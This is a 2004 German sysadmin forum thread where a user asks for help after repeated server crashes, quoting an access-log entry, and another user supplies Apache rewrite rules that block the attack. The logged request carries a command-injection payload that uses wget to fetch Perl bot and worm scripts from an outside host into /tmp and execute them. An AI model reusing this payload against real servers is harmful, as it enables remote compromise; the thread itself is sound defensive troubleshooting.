RootForum Community

Resources for System-Administrators
https://www.rootforum.org/forum/

Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

https://www.rootforum.org/forum/viewtopic.php?t=31943

Page 1 of 1

Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Posted: 2004-12-26 15:12
by mcx
Hallo,

mein Webserver wird seit 2 Tagen ständig zum Absturz gebracht.

folgende Einträge finden sich in den Access-Logs:

Code: Select all

69.72.197.66 - - [26/Dec/2004:14:57:59 +0100] "GET /index.php/cPath/78?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 59825 "-" "LWP::Simple/5.803"
????

SuSE 8.1, Apache 1.3.26

Was kann ich da machen ?

Gruß

Markus

Re: Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Posted: 2004-12-26 15:35
by Joe User
Boardsuche nutzen...

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

Re: Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Posted: 2004-12-26 16:28
by mcx
Hallo,

habe die entsprechenden Rewrite Rules in meine Virtual Hosts und den SSL-Proxy eingetragen. Ich hoffe das es was bringt.

Frohe Weihnachten zusammen.

Gruß

Markus

Re: Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Posted: 2004-12-26 22:29
by mcx
es hat geklappt, server läuft stabil ....

Danke
All times are UTC+01:00
Page 1 of 1